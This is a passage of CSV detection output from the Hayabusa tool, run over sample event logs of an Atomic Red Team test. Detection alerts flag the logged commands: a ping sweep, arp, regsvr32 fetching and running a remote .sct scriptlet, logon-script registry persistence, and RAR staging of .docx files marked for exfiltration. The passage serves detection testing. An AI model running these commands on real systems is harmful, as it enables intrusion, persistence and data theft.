Creation,"Command: ping -n 1 -w 100 192.168.1.229 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:29.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.230 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:30.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.231 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:30.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.232 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:31.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.233 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:31.530 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.234 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:32.058 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.235 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:32.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.236 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:33.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.237 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:33.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.238 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:34.005 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.239 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:34.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.240 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:35.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.241 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:35.559 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.242 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:36.025 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.243 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:36.536 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.244 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:37.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.245 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:37.505 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.246 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:38.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.247 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:38.588 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.248 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:39.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.249 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:39.518 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.250 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:40.006 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.251 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:40.535 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.252 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:40.982 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.253 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:41.530 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.254 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.061 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,low,Suspicious Network Command,,rules/sigma/process_creation/win_pc_susp_network_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.301 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: arp -a : Path: C:\Windows\System32\ARP.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""arp -a""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.404 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.815 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:43.445 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:43.574 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:44.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:45.157 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.204 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\SysWOW64\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:47.083 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\SysWOW64\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:47.239 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:54.976 +09:00,-,-,low,Quick Execution of a Series of Suspicious Commands,[condition] count() by MachineName > 5 in timeframe [result] count:8 MachineName:null timeframe:5m,rules/sigma/process_creation/win_multiple_suspicious_cli.yml,- +2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,high,Logon Scripts (UserInitMprLogonScript) Registry,,rules/sigma/registry_event/sysmon_logon_scripts_userinitmprlogonscript_reg.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,medium,Commun Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_commun.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:01.955 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:16.782 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""rar a -r exfilthis.rar *.docx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:16.830 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 